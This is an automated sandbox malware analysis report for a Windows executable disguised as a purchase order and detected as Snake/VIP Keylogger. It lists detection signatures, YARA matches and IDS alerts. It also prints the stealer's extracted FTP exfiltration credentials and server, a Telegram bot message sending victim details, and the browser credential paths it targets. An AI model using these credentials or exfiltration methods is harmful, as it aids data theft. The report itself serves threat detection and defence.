Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe

Overview

General Information

Sample name:Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe
renamed because original name is a hash value
Original sample name:Satnalma Siparii Q4-2025-V5560001.exe
Analysis ID:1640565
MD5:e955281fbc1e1ea32966a99e8441cb0e
SHA1:44904346cf2099f47b8b794e02215d096cfec35c
SHA256:a0d767fd05c090d8d2f7f32b4a545fa5256e80962ec54facdaf2ac89f8acb3f7
Tags:exeuser-adrian__luca
Infos:

Detection

Snake Keylogger, VIP Keylogger
Score:100
Range:0 - 100
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
Binary is likely a compiled AutoIt script file
Joe Sandbox ML detected suspicious sample
Maps a DLL or memory area into another process
Sample uses string decryption to hide its real strings
Switches to a custom stack to bypass stack traces
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Writes to foreign memory regions
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe (PID: 6244 cmdline: "C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe" MD5: E955281FBC1E1EA32966A99E8441CB0E)
    • RegSvcs.exe (PID: 2400 cmdline: "C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: VIP Keylogger

{"Exfil Mode": "FTP", "Username": "bless@ercolina-usa.com", "Password": "XWszt[=}{0?6", "FTP Server": "ftp://ftp.ercolina-usa.com//"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000002.00000002.3423549370.0000000002E91000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
    00000000.00000002.980924587.00000000037F0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000000.00000002.980924587.00000000037F0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
        00000000.00000002.980924587.00000000037F0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
          00000000.00000002.980924587.00000000037F0000.00000004.00001000.00020000.00000000.sdmpWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
          • 0x354b7:$a1: get_encryptedPassword
          • 0x3548b:$a2: get_encryptedUsername
          • 0x3554f:$a3: get_timePasswordChanged
          • 0x35467:$a4: get_passwordField
          • 0x354cd:$a5: set_encryptedPassword
          • 0x3529a:$a7: get_logins
          • 0x30b7e:$a10: KeyLoggerEventArgs
          • 0x30b4d:$a11: KeyLoggerEventArgsEventHandler
          • 0x3536e:$a13: _encryptedPassword
          Click to see the 14 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          0.2.Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe.37f0000.1.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            0.2.Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe.37f0000.1.unpackJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
              0.2.Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe.37f0000.1.unpackJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
                0.2.Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe.37f0000.1.unpackWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
                • 0x338b7:$a1: get_encryptedPassword
                • 0x3388b:$a2: get_encryptedUsername
                • 0x3394f:$a3: get_timePasswordChanged
                • 0x33867:$a4: get_passwordField
                • 0x338cd:$a5: set_encryptedPassword
                • 0x3369a:$a7: get_logins
                • 0x2ef7e:$a10: KeyLoggerEventArgs
                • 0x2ef4d:$a11: KeyLoggerEventArgsEventHandler
                • 0x3376e:$a13: _encryptedPassword
                0.2.Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe.37f0000.1.unpackMAL_Envrial_Jan18_1Detects Encrial credential stealer malwareFlorian Roth
                • 0x3d65e:$a2: \Comodo\Dragon\User Data\Default\Login Data
                • 0x3cd01:$a3: \Google\Chrome\User Data\Default\Login Data
                • 0x3cf5e:$a4: \Orbitum\User Data\Default\Login Data
                • 0x3d93d:$a5: \Kometa\User Data\Default\Login Data
                Click to see the 13 entries

                Sigma Signatures

                No Sigma rule has matched

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-03-17T13:03:38.400816+010028033053Unknown Traffic192.168.2.849684104.21.32.1443TCP
                2025-03-17T13:03:45.490348+010028033053Unknown Traffic192.168.2.849694104.21.32.1443TCP
                2025-03-17T13:03:48.443545+010028033053Unknown Traffic192.168.2.849702104.21.32.1443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-03-17T13:03:36.755978+010028032742Potentially Bad Traffic192.168.2.849682132.226.8.16980TCP
                2025-03-17T13:03:37.818484+010028032742Potentially Bad Traffic192.168.2.849682132.226.8.16980TCP
                2025-03-17T13:03:39.240378+010028032742Potentially Bad Traffic192.168.2.849685132.226.8.16980TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-03-17T13:03:49.380442+010018100071Potentially Bad Traffic192.168.2.849704149.154.167.220443TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Found malware configuration
                Source: 00000002.00000002.3423549370.0000000002E91000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: VIP Keylogger {"Exfil Mode": "FTP", "Username": "bless@ercolina-usa.com", "Password": "XWszt[=}{0?6", "FTP Server": "ftp://ftp.ercolina-usa.com//"}
                Multi AV Scanner detection for submitted file
                Source: Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exeReversingLabs: Detection: 47%
                Joe Sandbox ML detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Sample uses string decryption to hide its real strings
                Source: 0.2.Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe.37f0000.1.raw.unpackString decryptor: bless@ercolina-usa.com
                Source: 0.2.Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe.37f0000.1.raw.unpackString decryptor: XWszt[=}{0?6
                Source: 0.2.Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe.37f0000.1.raw.unpackString decryptor: ftp://ftp.ercolina-usa.com//
                Source: 0.2.Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe.37f0000.1.raw.unpackString decryptor:

                Location Tracking

                barindex
                Tries to detect the country of the analysis system (by using the IP)
                Source: unknownDNS query: name: reallyfreegeoip.org
                Source: Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.8:49683 version: TLS 1.0
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:49704 version: TLS 1.2
                Source: Binary string: wntdll.pdbUGP source: Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe, 00000000.00000003.978158836.0000000003B90000.00000004.00001000.00020000.00000000.sdmp, Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe, 00000000.00000003.979850232.0000000003F50000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe, 00000000.00000003.978158836.0000000003B90000.00000004.00001000.00020000.00000000.sdmp, Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe, 00000000.00000003.979850232.0000000003F50000.00000004.00001000.00020000.00000000.sdmp
                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exeCode function: 0_2_006B4696 GetFileAttributesW,FindFirstFileW,FindClose,0_2_006B4696
                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exeCode function: 0_2_006BC93C FindFirstFileW,FindClose,0_2_006BC93C
                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exeCode function: 0_2_006BC9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_006BC9C7
                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exeCode function: 0_2_006BF200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_006BF200
                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exeCode function: 0_2_006BF35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_006BF35D
                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exeCode function: 0_2_006BF65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_006BF65E
                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exeCode function: 0_2_006B3A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_006B3A2B
                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exeCode function: 0_2_006B3D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_006B3D4E
                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exeCode function: 0_2_006BBF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_006BBF27
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0125F4B0h2_2_0125F313
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0125F4B0h2_2_0125F4FF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0125FC74h2_2_0125F9B8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05A6D2EBh2_2_05A6D018
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05A67EC8h2_2_05A67B88
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05A6929Bh2_2_05A68FC8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05A6144Ch2_2_05A611A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05A6C08Bh2_2_05A6BDB8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05A6A063h2_2_05A69D90
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05A6E0B3h2_2_05A6DDE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05A618A4h2_2_05A615F8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05A6BBF3h2_2_05A6B920
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05A6FC1Bh2_2_05A6F970
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05A60FF4h2_2_05A60D48
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05A6DC1Bh2_2_05A6D948
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05A6D783h2_2_05A6D4B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05A6B75Bh2_2_05A6B488
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05A6673Eh2_2_05A66490
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05A60744h2_2_05A60498
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05A60B9Ch2_2_05A608F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05A69BCBh2_2_05A698F8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05A6F7ABh2_2_05A6F4D8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05A662E4h2_2_05A66038
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05A632B4h2_2_05A63008
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05A6370Ch2_2_05A63460
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05A69733h2_2_05A69460
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05A602ECh2_2_05A60040
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05A6F313h2_2_05A6F040
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05A6EE7Bh2_2_05A6EBA8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05A62E5Ch2_2_05A62BB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05A6CE53h2_2_05A6CB80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05A65A34h2_2_05A65788
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05A65E8Ch2_2_05A65BE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05A6B2C3h2_2_05A6AFF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05A655DCh2_2_05A65330
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05A679DCh2_2_05A67730
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05A625ACh2_2_05A62300
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05A6E9E3h2_2_05A6E710
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05A62A04h2_2_05A62758
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05A6AE2Bh2_2_05A6AB58
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05A62154h2_2_05A61EA8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05A64D2Ch2_2_05A64A80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05A6712Ch2_2_05A66E80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05A6C9BBh2_2_05A6C6E8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05A6A993h2_2_05A6A6C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05A65184h2_2_05A64ED8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05A67584h2_2_05A672D8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05A648D4h2_2_05A64628
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05A66CD4h2_2_05A66A28
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05A6A4FBh2_2_05A6A228
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05A6E54Bh2_2_05A6E278
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05A61CFCh2_2_05A61A50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05A6C523h2_2_05A6C250

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.8:49704 -> 149.154.167.220:443
                Uses the Telegram API (likely for C&C communication)
                Source: unknownDNS query: name: api.telegram.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:377142%0D%0ADate%20and%20Time:%2017/03/2025%20/%2020:47:49%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20377142%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                Source: Joe Sandbox ViewIP Address: 132.226.8.169 132.226.8.169
                Source: Joe Sandbox ViewIP Address: 192.254.225.136 192.254.225.136
                Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                Source: unknownDNS query: name: checkip.dyndns.org
                Source: unknownDNS query: name: reallyfreegeoip.org
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49685 -> 132.226.8.169:80
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49682 -> 132.226.8.169:80
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49684 -> 104.21.32.1:443
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49702 -> 104.21.32.1:443
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49694 -> 104.21.32.1:443
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.8:49683 version: TLS 1.0
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exeCode function: 0_2_006C25E2 InternetReadFile,InternetQueryDataAvailable,InternetReadFile,0_2_006C25E2
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:377142%0D%0ADate%20and%20Time:%2017/03/2025%20/%2020:47:49%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20377142%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
